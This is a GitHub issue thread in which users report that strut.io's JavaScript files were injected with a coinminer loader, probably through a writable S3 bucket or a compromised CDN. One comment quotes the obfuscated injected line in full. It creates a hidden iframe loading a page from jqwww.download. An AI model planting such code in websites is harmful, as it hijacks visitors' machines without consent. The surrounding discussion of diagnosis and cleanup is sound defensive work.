strut.io has been injected with a coinminer script about strut HOT 15 CLOSED

Still compromised... 🔥

from strut.

it's actually a one line injected into what appears to be each JS file, require.js, loadPresentation.js, swfobject.js, ...etc.

This is the content of the injected line:

var _0x75b214=["iframe","setAttribute","https://www.jqwww.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x75b214,367);var _0x48ae8e=function(t,x){var a=_0x75b214[t-=0];return a};a=document[_0x48ae8e("0x0")](_0x48ae8e("0x1")),a[_0x48ae8e("0x2")]("src",_0x48ae8e("0x3")),a.style.width="0px",a.style.height="1px",document[_0x48ae8e("0x4")][_0x48ae8e("0x5")](a);

I think we should email @tantaman about this. Since it's kinda urgent..

from strut.

This has been resolved as of today.

http://strut.io/editor

from strut.

o_O

Any idea how that could have happened?

from strut.

Someone has injected a script onto the *.vendor.js file of your strut.io website. Either someone hacked the file directly or has infected a CDN where you're pulling files from.
The script injects an <iframe> on your index file the first time it loads.

from strut.

My assumptions have been that the scripts were modified server-side, but I like the alternate theory of a CDN being compromised. Whatever it is, I imagine its a propagating mechanism that is broadly targeted, and not specific to strut.io.

@tantaman the first step is to see if those files are modified on the server. Let us know.

from strut.

Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.

I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).

Just leaving note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.

from strut.

from strut.

They're in the midst of investigating now actually. I just told him I found it about 2 hours ago. I just happened to be surfing their website when the fan on my MacBook went nuts so I tracked it down to his site (open in a tab) and then started picking his files apart.

Only his JS files and some images are in the S3 bucket, rest of his site isn't (as far as I know, but I'll double check with him).

So what he's done for now is just kill those js files entirely -- they were only for fontawesome stuff. So he's using the fontawesome CDN now.

But he looked at other JS files he had in same bucket and they too were compromised. I told him to check logs, look for suspicious logins, check read/write permissions on the files/bucket, etc.

from strut.

While this is up for discussion, as a random thought: couldn't Strut technically be hosted on GitHub pages, since it's entirely client-side?

from strut.

I've notified my contacts at Amazon. Wonder if they could grep the whole system ;)

from strut.

Another repo potentially related as it mentions AWS as well. Last comment says something about their CDN permissions being set public -- not sure if that has anything to do with it, I'm not a big AWS user.

uBlockOrigin/uAssets#1698

But figured I'd share if it helps your investigation.

from strut.

I've personally never used S3 before, so this exercise has been rather educational ...

https://www.tripwire.com/state-of-security/security-data-protection/cloud/public-aws-s3-buckets-writable/

I'm really shocked that this is a problem, and that it hasn't been used for things far more nefarious!

from strut.

Hi there. The problem isn't resolved yet

from strut.

#387 (comment)

from strut.